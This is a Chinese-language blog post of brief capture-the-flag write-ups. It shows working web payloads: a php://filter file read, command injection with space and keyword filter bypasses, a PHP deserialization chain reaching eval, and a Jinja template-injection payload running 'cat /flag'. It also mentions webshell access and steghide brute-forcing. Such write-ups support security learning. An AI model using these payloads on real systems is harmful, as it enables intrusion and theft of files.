youbing的博客

这道题需要用SplFileObject但是题目中没有foreach函数所以用伪协议得到flag

Payload：?sys=SplFileObject&xsx=php://filter/convert.base64-encode/resource=flag.php

解码得到flag

这道题用oursecret 得到1.txt

打开发现是base64编码

两次解码得到flag

这里用``执行命令用echo输出结果，然后用//注释后面的括号防止干扰，先?args1=echo(ls);//

发现当前页面下有一个flagggg

这里用<绕过空格读取flagggg

Payload：?args1=echo(cat<flagggg);//

这道题很多符号被禁用了，用\可以绕过一些检测，这里用l\s发现当前目录只有index.php

/符号在这里被禁用了，先看看index.php里面有什么，结果index.php也被禁用了，这里用变量拼接index.php

Payload：;a=in;b=dex;ta\c$IFS$9$a$b.php

发现index.php代码中有一个flag变量，得到flag

这道题的触发逻辑 __destruct() -> funnnn() -> handle–>close() -> eval($pid)

构造脚本

<?php

class process {

public $pid;

function close() {

eval($this->pid);

}

}

class example {

public $handle;

}

$a = new example();

$a->handle = new process();

$a->handle->pid = "phpinfo();";

echo serialize($a);

?>

Payload：O:7:"example":1:{s:6:"handle";O:7:"process":1:{s:3:"pid";s:10:"phpinfo();";}}

得到flag

``

下载题目附件发现是一个php文件

用工具解密得到

蚁剑连接得到flag

这道题发现可以注入  构造payload：{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].popen('cat /flag').read()}} 得到flag 

这道题查看源码发现$strTmp == $strContent时可以得到flag

$strContent 是由 trim($strFlag, $strCharList);得到的这里写一段代码直接算出$strContent，再传个相同值的$strTmp

输入?strTmp=%09xxxxx…xxxxx%09得到flag

这道题看图完整的只有这6个中间还有顺序的数字

根据1不动把每个面拼成立体864513解出来就是952375再按照题目加密

得到flag

Flag{70af0aa975da81f48080d64b400b03d7}

第一部分是一个残缺的二维码把它补齐

识别得到https://qr61.cn/oLHDAn/qYdgRdp查看发现是一段代码

第二部分是一个加密的word文件附带了一串数字猜测是按照ascll码转换成字符

得到f1@9i$HerE成功解开加密，打开发现是空的

发现后面还有未显示的内容改一下字体颜色得到内容

解码得到第二部分内容

第三部分查看图片属性备注提示steghide

用stegseek爆破

得到第三部分

合并代码运行发现歌曲是晴天根据提示得到flag

flag{cbbe546304037478ce0c36437d036711}